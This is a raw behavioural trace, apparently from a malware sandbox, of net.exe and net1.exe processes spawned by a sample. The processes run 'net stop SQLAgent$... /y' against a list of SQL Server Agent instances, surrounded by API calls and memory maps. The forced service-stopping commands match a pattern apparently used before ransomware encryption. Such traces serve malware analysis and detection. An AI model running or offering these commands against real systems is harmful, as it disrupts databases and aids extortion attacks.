[0111.199] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.199] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.199] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa28 | out: Buffer=0x1afa28*=0x28c0f0) returned 0x0 [0111.199] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa28 | out: Buffer=0x1afa28*=0x28c110) returned 0x0 [0111.199] _fileno (_File=0x7fefdba2a80) returned 0 [0111.199] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.200] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.200] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.200] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.200] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.200] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.200] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.200] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.200] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.200] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.200] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.200] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.200] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.200] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.200] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.200] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.200] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.200] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.200] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.200] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.200] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.200] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.200] _wcsicmp (_String1="accounts", _String2="SQLAgent$PROFXENGAGEMENT") returned -18 [0111.200] _wcsicmp (_String1="computer", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0111.200] _wcsicmp (_String1="config", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0111.200] _wcsicmp (_String1="continue", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0111.200] _wcsicmp (_String1="cont", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0111.200] _wcsicmp (_String1="file", _String2="SQLAgent$PROFXENGAGEMENT") returned -13 [0111.201] _wcsicmp (_String1="files", _String2="SQLAgent$PROFXENGAGEMENT") returned -13 [0111.201] _wcsicmp (_String1="group", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0111.201] _wcsicmp (_String1="groups", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0111.201] _wcsicmp (_String1="help", _String2="SQLAgent$PROFXENGAGEMENT") returned -11 [0111.201] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PROFXENGAGEMENT") returned -11 [0111.201] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PROFXENGAGEMENT") returned -7 [0111.201] _wcsicmp (_String1="pause", _String2="SQLAgent$PROFXENGAGEMENT") returned -3 [0111.201] _wcsicmp (_String1="session", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0111.201] _wcsicmp (_String1="sessions", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0111.201] _wcsicmp (_String1="sess", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0111.201] _wcsicmp (_String1="share", _String2="SQLAgent$PROFXENGAGEMENT") returned -9 [0111.201] _wcsicmp (_String1="start", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0111.201] _wcsicmp (_String1="stats", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0111.201] _wcsicmp (_String1="statistics", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0111.201] _wcsicmp (_String1="stop", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0111.201] _wcsicmp (_String1="time", _String2="SQLAgent$PROFXENGAGEMENT") returned 1 [0111.201] _wcsicmp (_String1="user", _String2="SQLAgent$PROFXENGAGEMENT") returned 2 [0111.201] _wcsicmp (_String1="users", _String2="SQLAgent$PROFXENGAGEMENT") returned 2 [0111.201] _wcsicmp (_String1="msg", _String2="SQLAgent$PROFXENGAGEMENT") returned -6 [0111.201] _wcsicmp (_String1="messenger", _String2="SQLAgent$PROFXENGAGEMENT") returned -6 [0111.201] _wcsicmp (_String1="receiver", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0111.201] _wcsicmp (_String1="rcv", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0111.201] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PROFXENGAGEMENT") returned -5 [0111.201] _wcsicmp (_String1="redirector", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0111.201] _wcsicmp (_String1="redir", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0111.201] _wcsicmp (_String1="rdr", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0111.201] _wcsicmp (_String1="workstation", _String2="SQLAgent$PROFXENGAGEMENT") returned 4 [0111.201] _wcsicmp (_String1="work", _String2="SQLAgent$PROFXENGAGEMENT") returned 4 [0111.201] _wcsicmp (_String1="wksta", _String2="SQLAgent$PROFXENGAGEMENT") returned 4 [0111.201] _wcsicmp (_String1="prdr", _String2="SQLAgent$PROFXENGAGEMENT") returned -3 [0111.201] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PROFXENGAGEMENT") returned -15 [0111.201] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PROFXENGAGEMENT") returned -7 [0111.201] _wcsicmp (_String1="server", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0111.201] _wcsicmp (_String1="svr", _String2="SQLAgent$PROFXENGAGEMENT") returned 5 [0111.202] _wcsicmp (_String1="srv", _String2="SQLAgent$PROFXENGAGEMENT") returned 1 [0111.202] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PROFXENGAGEMENT") returned -7 [0111.202] _wcsicmp (_String1="alerter", _String2="SQLAgent$PROFXENGAGEMENT") returned -18 [0111.202] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PROFXENGAGEMENT") returned -5 [0111.202] _wcsupr (in: _String="SQLAgent$PROFXENGAGEMENT" | out: _String="SQLAGENT$PROFXENGAGEMENT") returned="SQLAGENT$PROFXENGAGEMENT" [0111.202] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x28ce20 [0111.206] GetServiceKeyNameW (in: hSCManager=0x28ce20, lpDisplayName="SQLAGENT$PROFXENGAGEMENT", lpServiceName=0xff725750, lpcchBuffer=0x1af948 | out: lpServiceName="", lpcchBuffer=0x1af948) returned 0 [0111.207] _wcsicmp (_String1="msg", _String2="SQLAGENT$PROFXENGAGEMENT") returned -6 [0111.207] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PROFXENGAGEMENT") returned -6 [0111.207] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0111.207] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0111.207] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0111.207] _wcsicmp (_String1="redir", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0111.207] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0111.207] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PROFXENGAGEMENT") returned 4 [0111.208] _wcsicmp (_String1="work", _String2="SQLAGENT$PROFXENGAGEMENT") returned 4 [0111.208] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PROFXENGAGEMENT") returned 4 [0111.208] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PROFXENGAGEMENT") returned -3 [0111.208] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PROFXENGAGEMENT") returned -15 [0111.208] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PROFXENGAGEMENT") returned -7 [0111.208] _wcsicmp (_String1="server", _String2="SQLAGENT$PROFXENGAGEMENT") returned -12 [0111.208] _wcsicmp (_String1="svr", _String2="SQLAGENT$PROFXENGAGEMENT") returned 5 [0111.208] _wcsicmp (_String1="srv", _String2="SQLAGENT$PROFXENGAGEMENT") returned 1 [0111.208] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PROFXENGAGEMENT") returned -7 [0111.208] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PROFXENGAGEMENT") returned -18 [0111.208] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PROFXENGAGEMENT") returned -5 [0111.208] NetServiceControl (in: servername=0x0, service="SQLAGENT$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x1af950 | out: bufptr=0x1af950) returned 0x889 [0111.209] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0111.209] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0111.210] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0111.211] GetFileType (hFile=0xb) returned 0x2 [0111.212] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0111.212] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x1af810*=0x1e) returned 1 [0111.212] GetFileType (hFile=0xb) returned 0x2 [0111.212] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0111.213] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x1af810*=0x2) returned 1 [0111.213] _ultow (in: _Dest=0x889, _Radix=1767552 | out: _Dest=0x889) returned="2185" [0111.213] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0111.213] GetFileType (hFile=0xb) returned 0x2 [0111.214] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0111.214] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x1af810*=0x34) returned 1 [0111.214] GetFileType (hFile=0xb) returned 0x2 [0111.214] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0111.215] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x1af810*=0x2) returned 1 [0111.215] NetApiBufferFree (Buffer=0x28c0f0) returned 0x0 [0111.215] NetApiBufferFree (Buffer=0x28c110) returned 0x0 [0111.215] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROFXENGAGEMENT /y" [0111.215] exit (_Code=2) Process: id = "279" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x55a78000" os_pid = "0x1024" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10226 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10227 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10228 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10229 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10230 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10231 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10232 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10233 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10234 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10235 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10236 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 10237 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10238 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10239 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10240 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 771 os_tid = 0x1150 Process: id = "280" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x52998000" os_pid = "0x10d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10241 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10242 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10243 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10244 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10245 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10246 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10247 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10248 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10249 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10250 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10251 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 10252 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10253 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 10254 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10255 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 773 os_tid = 0x11d8 Process: id = "281" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5ed82000" os_pid = "0x112c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "274" os_parent_pid = "0x101c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10256 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10257 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10258 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10259 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10260 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10261 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10262 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10263 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10264 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10265 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10266 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 10267 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10268 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10269 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10270 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10286 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10287 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10288 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10289 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10290 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 10291 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10292 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10293 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10294 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10295 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10296 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10297 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10298 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10299 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10300 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10301 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10302 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10303 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10304 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10305 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10306 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10307 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10308 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10332 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 775 os_tid = 0x110c [0111.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb50 | out: lpSystemTimeAsFileTime=0x14fb50*(dwLowDateTime=0xf7a5c9d0, dwHighDateTime=0x1d48689)) [0111.557] GetCurrentProcessId () returned 0x112c [0111.557] GetCurrentThreadId () returned 0x110c [0111.557] GetTickCount () returned 0x25994 [0111.557] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb58 | out: lpPerformanceCount=0x14fb58*=1815847500000) returned 1 [0111.558] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.558] __set_app_type (_Type=0x1) [0111.558] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.558] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.559] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.559] GetConsoleOutputCP () returned 0x1b5 [0111.574] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.574] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.576] sprintf_s (in: _DstBuf=0x14faf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.576] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.578] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.578] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SBSMONITORING /y" [0111.578] 